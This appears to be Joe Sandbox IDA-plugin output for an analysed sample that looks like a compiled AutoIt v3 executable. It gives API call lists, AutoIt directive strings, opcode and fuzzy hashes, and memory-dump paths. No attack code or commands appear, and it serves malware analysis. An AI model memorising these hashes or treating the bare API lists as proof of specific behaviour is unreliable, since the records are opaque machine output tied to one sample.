                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2797419724-0
                                                                                                                              • Opcode ID: 9090546a2ae3822ead9be172c99ea96b564425aa2cdaf4dd210d0b88d25c443f
                                                                                                                              • Instruction ID: 283077664272175f480b25f3123b705c85b817763af4ee56a69e58cac9d89831
                                                                                                                              • Opcode Fuzzy Hash: 9090546a2ae3822ead9be172c99ea96b564425aa2cdaf4dd210d0b88d25c443f
                                                                                                                              • Instruction Fuzzy Hash: C3D012B114430C77EF103B61EC0BF5D3E1EAB11750F408431F705691E18B716561AA59
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00198E1F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: 4eda8dac582eb5f0f436a6cb6bb44d902984a6ac7808524b25838cab0e2cecb3
                                                                                                                              • Instruction ID: a818c556d7aad19f05a8e645a3635653e740742dd84879f27234974978e20868
                                                                                                                              • Opcode Fuzzy Hash: 4eda8dac582eb5f0f436a6cb6bb44d902984a6ac7808524b25838cab0e2cecb3
                                                                                                                              • Instruction Fuzzy Hash: E4A0127000450CA78B001B51FC044687F5DE7041507004010F50C00421873354508581
                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00196AE9,002267D8,00000014), ref: 0019A937
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 54951025-0
                                                                                                                              • Opcode ID: f2d70c7929174ac120a8d6dc8720508752b093e45de173940520503487a19c4f
                                                                                                                              • Instruction ID: 57e14c0aa69bc0a7e344ffa376abf222424999c8e22e3272c0c9db67aa0ee105
                                                                                                                              • Opcode Fuzzy Hash: f2d70c7929174ac120a8d6dc8720508752b093e45de173940520503487a19c4f
                                                                                                                              • Instruction Fuzzy Hash: C0B012F03031028BD7084B38BCA823E3AD55749101301407D7003C3D60DB30C450DF00
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                              • Instruction ID: db7432651e602aee90e9d85f4ef826b45951f4671d71587afb76d67ec0867de0
                                                                                                                              • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                              • Instruction Fuzzy Hash: 4EC1A7722051934EDF2E8639C43443EFBA15EA27B131A076DE8B3CB5C4EF24DAA4D650
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                              • Instruction ID: 1abaaa4ea48e9f1c13893b92ce00085428680c6a162517d60fdc154676013157
                                                                                                                              • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                              • Instruction Fuzzy Hash: 5CC196722051934EDF2E8639C47443EFAA15AA27B131B076DD8B3CF5D4EF24CAA4D660
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                              • Instruction ID: b84bf6da1adbe6bfde72bb6a7c96be8b64378989b735e5620098345084f10c75
                                                                                                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                              • Instruction Fuzzy Hash: 46C1B3722052934EDF2F8639C43443EFBA15AA67B531A076DD8B3CB4C4EF24DA64D660
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                              • Instruction ID: 82e51fbed9e2f49243551a5e4d4752c3e136ec2795ab4539fc37f64a348d23a8
                                                                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                              • Instruction Fuzzy Hash: 01C1D2722051934EDF2F863AC43443EBBA15EA67B531A076DD8B3CB4C1EF24DA64D660
                                                                                                                              APIs
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 001CA7A5
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 001CA7B7
                                                                                                                              • DestroyWindow.USER32 ref: 001CA7C5
                                                                                                                              • GetDesktopWindow.USER32 ref: 001CA7DF
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 001CA7E6
                                                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 001CA927
                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 001CA937
                                                                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CA97F
                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 001CA98B
                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001CA9C5
                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CA9E7
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CA9FA
                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CAA05
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 001CAA0E
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CAA1D
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 001CAA26
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CAA2D
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 001CAA38
                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 001CAA4A
                                                                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,001FD9BC,00000000), ref: 001CAA60
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 001CAA70
                                                                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 001CAA96
                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 001CAAB5
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CAAD7
                                                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001CACC4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                              • API String ID: 2211948467-2373415609
                                                                                                                              • Opcode ID: 819ef504da44bf276d6f602d47c007c391674d40b8df8c3140080e3cd61ce2ab
                                                                                                                              • Instruction ID: 98308858b6f02410a665df6c8da822644ed690dd12008225b78615084f222712
                                                                                                                              • Opcode Fuzzy Hash: 819ef504da44bf276d6f602d47c007c391674d40b8df8c3140080e3cd61ce2ab
                                                                                                                              • Instruction Fuzzy Hash: F6026C71900219AFDB15DFA4DD89EBE7BB9EF48314F108159F905AB2A0DB30ED41CBA1
                                                                                                                              APIs
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 001DD0EB
                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 001DD11C
                                                                                                                              • GetSysColor.USER32(0000000F), ref: 001DD128
                                                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 001DD142
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 001DD151
                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 001DD17C
                                                                                                                              • GetSysColor.USER32(00000010), ref: 001DD184
                                                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 001DD18B
                                                                                                                              • FrameRect.USER32(?,?,00000000), ref: 001DD19A
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 001DD1A1
                                                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 001DD1EC
                                                                                                                              • FillRect.USER32(?,?,00000000), ref: 001DD21E
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 001DD249
                                                                                                                                • Part of subcall function 001DD385: GetSysColor.USER32(00000012), ref: 001DD3BE
                                                                                                                                • Part of subcall function 001DD385: SetTextColor.GDI32(?,?), ref: 001DD3C2
                                                                                                                                • Part of subcall function 001DD385: GetSysColorBrush.USER32(0000000F), ref: 001DD3D8
                                                                                                                                • Part of subcall function 001DD385: GetSysColor.USER32(0000000F), ref: 001DD3E3
                                                                                                                                • Part of subcall function 001DD385: GetSysColor.USER32(00000011), ref: 001DD400
                                                                                                                                • Part of subcall function 001DD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001DD40E
                                                                                                                                • Part of subcall function 001DD385: SelectObject.GDI32(?,00000000), ref: 001DD41F
                                                                                                                                • Part of subcall function 001DD385: SetBkColor.GDI32(?,00000000), ref: 001DD428
                                                                                                                                • Part of subcall function 001DD385: SelectObject.GDI32(?,?), ref: 001DD435
                                                                                                                                • Part of subcall function 001DD385: InflateRect.USER32(?,000000FF,000000FF), ref: 001DD454
                                                                                                                                • Part of subcall function 001DD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001DD46B
                                                                                                                                • Part of subcall function 001DD385: GetWindowLongW.USER32(00000000,000000F0), ref: 001DD480
                                                                                                                                • Part of subcall function 001DD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001DD4A8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3521893082-0
                                                                                                                              • Opcode ID: 3d6145ab79bf2327805dd2fd1e4129d6e70993a8598204e9988b11ac4556d4a4
                                                                                                                              • Instruction ID: a7c5756b9ab396a298b4c52538dec1ef459fa57999c96f0a560965dc6f60f8b3
                                                                                                                              • Opcode Fuzzy Hash: 3d6145ab79bf2327805dd2fd1e4129d6e70993a8598204e9988b11ac4556d4a4
                                                                                                                              • Instruction Fuzzy Hash: 05915B72408301AFDB109F64EC48E7BBBBAFB89325F100A19F966965A0D771D984CB52
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(00000000), ref: 001CA42A
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001CA4E9
                                                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001CA527
                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 001CA539
                                                                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 001CA57F
                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 001CA58B
                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 001CA5CF
                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001CA5DE
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 001CA5EE
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 001CA5F2
                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001CA602
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001CA60B
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 001CA614
                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001CA642
                                                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 001CA659
                                                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 001CA694
                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001CA6A8
                                                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 001CA6B9
                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 001CA6E9
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 001CA6F4
                                                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001CA6FF
                                                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 001CA709
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                              • Opcode ID: a2dac53df530bf43fe43137ab74d00ee50fd056dea57c6e697df5c6aad76e3d2
                                                                                                                              • Instruction ID: 05f77f8dd06a998d6ffdff12c56de7a0a00ded74a77e700e63371150dabf9766
                                                                                                                              • Opcode Fuzzy Hash: a2dac53df530bf43fe43137ab74d00ee50fd056dea57c6e697df5c6aad76e3d2
                                                                                                                              • Instruction Fuzzy Hash: 40A14071A40219BFEB14DBA4DD49FBEBBB9EB04714F008115FA15A71E0D7B0AD50CB64
APIs
• SetErrorMode.KERNEL32(00000001), ref: 001BE45E
• GetDriveTypeW.KERNEL32(?,0020DC88,?,\\.\,0020DBF0), ref: 001BE54B
• SetErrorMode.KERNEL32(00000000,0020DC88,?,\\.\,0020DBF0), ref: 001BE6B1
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: f7542fa53c48b3ab405d24b93e43b92fc15e23efe854496d8a691a596046da63
• Instruction ID: d09163f42ce44964fa49bf721af793568d4fb63ee64c4b37ca2ba6853654fedd
• Opcode Fuzzy Hash: f7542fa53c48b3ab405d24b93e43b92fc15e23efe854496d8a691a596046da63
• Instruction Fuzzy Hash: F8512570258301BBC314EF54D891AE9B7E1BBA6704F62891BF406EB2A1DB70DE51DB42
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
• Opcode ID: c96367ed9898a78d0636b1a5e8e53c795a6a659100898f82fc2c1ac33ddfcded
• Instruction ID: 1c6322f942f6818c7b7af3e0bbf71584cce6804ce412bf886c131b80a65ca55f
• Opcode Fuzzy Hash: c96367ed9898a78d0636b1a5e8e53c795a6a659100898f82fc2c1ac33ddfcded
• Instruction Fuzzy Hash: 6A61FC316407127BDB29AA649C83FBA33BCAF26740F144029F959A71C3EF60DA51D6E1
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 001DC598
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 001DC64E
• SendMessageW.USER32(?,00001102,00000002,?), ref: 001DC669
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 001DC925
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: 0
• API String ID: 2326795674-4108050209
• Opcode ID: 0b25ded4791048787df18da4b93f6b100455dbbb0f841259b16a7e4f9d6c4068
• Instruction ID: d9d0b2893441344e8279706c2dd907c6f743554a4e758bf9b5ef263c2fd020cc
• Opcode Fuzzy Hash: 0b25ded4791048787df18da4b93f6b100455dbbb0f841259b16a7e4f9d6c4068
• Instruction Fuzzy Hash: CEF1D271204342AFE7258F24D889BAABBE5FF49354F080A2AF584D73A1D774D940DB92
APIs
• CharUpperBuffW.USER32(?,?,0020DBF0), ref: 001D6245
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 3964851224-45149045
• Opcode ID: b9c10bb9e84915ab2e5095b2b2486700cd42cec8f450fe70cc88b796e78a3542
• Instruction ID: 1309174593e4cfd885cdffd322444abd405a7d012431d0f45c37e8315edd1d4f
• Opcode Fuzzy Hash: b9c10bb9e84915ab2e5095b2b2486700cd42cec8f450fe70cc88b796e78a3542
• Instruction Fuzzy Hash: D0C195342142119FCB08FF54D451A6E77E6AFA5394F04886EF8865B396DF30DE4ACB82
APIs
• GetSysColor.USER32(00000012), ref: 001DD3BE
• SetTextColor.GDI32(?,?), ref: 001DD3C2
• GetSysColorBrush.USER32(0000000F), ref: 001DD3D8
• GetSysColor.USER32(0000000F), ref: 001DD3E3
• CreateSolidBrush.GDI32(?), ref: 001DD3E8
• GetSysColor.USER32(00000011), ref: 001DD400
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 001DD40E
• SelectObject.GDI32(?,00000000), ref: 001DD41F
• SetBkColor.GDI32(?,00000000), ref: 001DD428
• SelectObject.GDI32(?,?), ref: 001DD435
• InflateRect.USER32(?,000000FF,000000FF), ref: 001DD454
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001DD46B
• GetWindowLongW.USER32(00000000,000000F0), ref: 001DD480
